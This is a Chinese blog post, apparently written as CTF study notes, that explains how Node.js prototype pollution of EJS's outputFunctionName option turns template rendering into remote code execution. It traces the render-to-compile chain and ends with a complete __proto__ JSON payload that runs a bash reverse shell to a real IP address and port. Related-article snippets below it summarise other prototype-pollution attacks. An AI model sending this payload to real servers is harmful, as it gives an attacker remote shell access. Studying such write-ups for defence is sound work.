[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)

已于 2022-04-06 21:27:46 修改
阅读量1.7k 收藏 1
点赞数 1
分类专栏: # Web安全 文章标签: web安全 nodejs
于 2022-04-06 21:24:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/124000520
版权
EJS _CVE-2019-10744(outputFunctionName)

在EJS引擎当中,存在一个属性opts.outputFunctionName

(注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用)

读源码

ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。

【以下代码为exports.render-----调用----->handleCache

首先调用了render的话(在我们做题时可以看到的表层函数)请添加图片描述
render调用的handleCache中跟进调用了compile(记住,关键点)
请添加图片描述
【以下代码包含在ejscompile函数中】

// 输出解析后的html字符串
语法:ejs.compile(str,options);
参数参数说明
str这个是用来渲染的数据展示区域
opstions这是个额外的参数配置,可以省略,详见后面

请添加图片描述请添加图片描述
恰巧this.source是拼接而成的,在包含opts.outputFunctionName时会将其包含在内,动态拼接一个js语句字符串,这是十分危险的,因为在后续步骤中,会利用this.src构造可调用函数。
请添加图片描述请添加图片描述
因此操纵opts.outputFunctionName即可构造预期函数,实现RCE。

如下图,compile在此处会被调用并作为返回值返回,导致渲染变为代码执行。
请添加图片描述
也就是说,我们对{}原型进行污染添加opts.outputFunctionName属性(主要为了污染opts)下的恶意代码,就能利用渲染函数render的调用链,转为代码执行。

Payload

由源码知,

this.source = prepended + this.source + appended;
prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';

构造合适的opts.outputFunctionName,

a=2333;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2

整理为

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2"}}
車鈊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
node.js原型链污染漏洞
weixin_43610673的博客
02-27 2107
node.js入门:http://nodejs.cn/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs 根据上面说明要掌握的JavaScript部分直接看菜鸟教程学。 对象与原型链 JavaScript当中的所有事物都是对象:字符串、数值、数组、函数。对象只是一种特殊的数据。对象拥有属性和方法。 可以这样创建一个对象 var person = {firstName:"John", lastName:"Doe", age:50, eyeCo
新思科技《2022 年开源安全和风险分析》报告分析解读第三篇——许可证/开源维护部分
hhhhh109p的博客
05-24 780
目录 许可证 许可证冲突 无许可证或自定义许可证 各行业许可证合规情况 前十大有冲突的许可证(新增内容) 开源的维护 开源维护者的现状(新增内容) 总结 随着整个社会加速数字化、网络化、智能化,开源已经成为势不可挡的趋势,驱动云计算、大数据、人工智能等技术和产业的进步。而随着开源产业繁荣兴起,开源的安全问题也备受关注。 今年4月,新思科技发布了《2022年开源安全和风险分析》报告(OSSRA)。该报告由新思科技网络安全研究中心(CyRC)制作,共调查了17个行业的2400多个商业代码
浅谈 Nodejs原型链污染
weixin_63231007的博客
03-07 1121
nodejs原型链污染原理及利用
ejs原型链污染rce分析
lastwinn的博客
02-07 803
记录自己的所学以及理解
CTFshowWeb入门nodejs
Yu3511606536的博客
06-09 1161
ctfshowweb入门nodejs刷题,超详细基础
Ejs模板引擎注入实现RCE
2302_76827504的博客
04-12 1397
EJS是一个javascript模板库,用来从json数据中生成HTML字符串。
LINUX安装node/nodejs
01-07
安装npm/nodejs 二者之间的对应关系。 https://nodejs.org/zh-cn/download/releases/ 不建议自动安装(版本太老,且冲突) sudo apt -y install npm # 更新的并不是最新的。 sudo npm i npm@latest -g` sudo apt -...
nodejs基础之常用工具模块util用法分析
01-02
本文实例讲述了nodejs基础之常用工具模块util用法。分享给大家供大家参考,具体如下: util是nodejs的核心模块,提供常用函数的集合,用户弥补核心javascript的功能过于精简的不足 util.inherits 是一个实现对象间...
nodejs+mysql+ejs完成的博客
10-31
nodejs+mysql+ejs完成的博客,可以登录注册,查看别人的博客,个人中心,发布编辑删除博客,留言等等
NodeJS http模块用法示例【创建web服务器/客户端】
01-02
本文实例讲述了NodeJS http模块用法。分享给大家供大家参考,具体如下: Node.js提供了http模块,用于搭建HTTP服务端和客户端。 创建Web服务器 /** * node-http 服务端 */ let http = require('http'); let url =...
Nodejs原型链污染
qq_61768489的博客
02-05 587
Nodejs原型链污染例题解析
复现原型链污染
qq_53232332的博客
08-03 63
指向的是Foo类的prototype。那么,如果我们修改了中的值,是不是就可以修改Foo类呢?原因也显而易见:因为前面我们修改了foo的原型,而foo是一个Object类的实例,所以实际上是修改了Object这个类,给这个类增加了一个属性bar,值为2。后来,我们又用Object类创建了一个zoo对象,zoo对象自然也有一个bar属性了。那么,在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是。
nodejs原型链污染基础
qq_63928796的博客
02-06 697
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019年初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
2020-10 补丁日:Oracle多个产品高危漏洞安全风险通告
爱国小白帽
10-21 1900
2020-10 补丁日:Oracle多个产品高危漏洞安全风险通告 原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102101 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-21 0x01 事件简述 2020年10月21日,360CERT监测发现 Oracle官方 发布了 10月份 的安全更新。 此次安全更新发布了421个漏洞补丁,其中Oracle Fusion Middleware有46个漏洞补丁更新
sudo提权漏洞(CVE-2019-14287)
SoulCat
10-16 680
sudo权限绕过漏洞,payload(CVE-2019-14287) 希望你别像风在我这里掀起了万般波澜却又跟云去了远方 漏洞概述: sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户的 ID 。 漏洞...
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
cp15191163199的博客
08-09 330
作者: HACHp1@知道创宇404实验室 日期: 2019/08/08 原文链接: https://paper.seebug.org/...
JavaScript原型链污染攻击
BerL1n
07-18 7164
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
用前端原型链漏洞污染拿下了服务器
程序员成长指北
07-12 448
大厂技术高级前端Node进阶点击上方程序员成长指北,关注公众号回复1,加入高级Node交流群作为前端开发者,某天偶然遇到了原型链污染漏洞,原本以为没有什么影响,好奇心驱使下,抽丝剥茧,发现原型链污染漏洞竟然也可以拿下服务器的shell管理权限,不可不留意!某天正奋力的coding,机器人给发了这样一条消息查看发现是一个叫“原型链污染”(Prototype cha...
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 1956
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
nodejs原型链污染
最新发布
09-12
在Node.js中,原型链污染是一种安全漏洞,它利用了JavaScript中原型继承的特性。通过修改原型链,攻击者可以在目标对象上注入恶意属性或方法。 在提供的引用内容中,通过调用`utils.copy(user, req.body)`函数,攻击者可以实现原型链污染。在`copy`函数中,遍历`object2`的属性,并将其逐一赋值给`object1`。如果`object1`和`object2`中都存在相同的属性,那么就会调用递归函数`copy`来复制这个属性的值。这个过程中,如果`object2`中的属性也是一个对象,并且在`object1`中也存在相同的属性,那么递归调用`copy`函数会继续在这个属性上进行操作。 通过构造特定的恶意输入,攻击者可以将`Object.prototype`中的属性或方法注入到 `req.body` 对象中。在提供的代码示例中,攻击者可以设置 `req.body` 的属性 `secert` 为一个对象,从而使其继承自 `Object.prototype`。这样,`req.body` 对象就获得了 `Object.prototype` 中的所有属性和方法,包括 `toString`、`hasOwnProperty`等。进一步,当代码判断 `secert.ctfshow` 等于 `'36dboy'` 时,就会返回`flag`,使得攻击者可以绕过登录验证获取到敏感信息。 因此,通过利用原型链污染,攻击者可以在Node.js应用中实现恶意操作,并绕过原本的安全检查。为了防止原型链污染的攻击,开发者应该对输入进行严格的验证和过滤,确保不会接受恶意的输入,并且避免直接使用`Object.prototype`的属性和方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值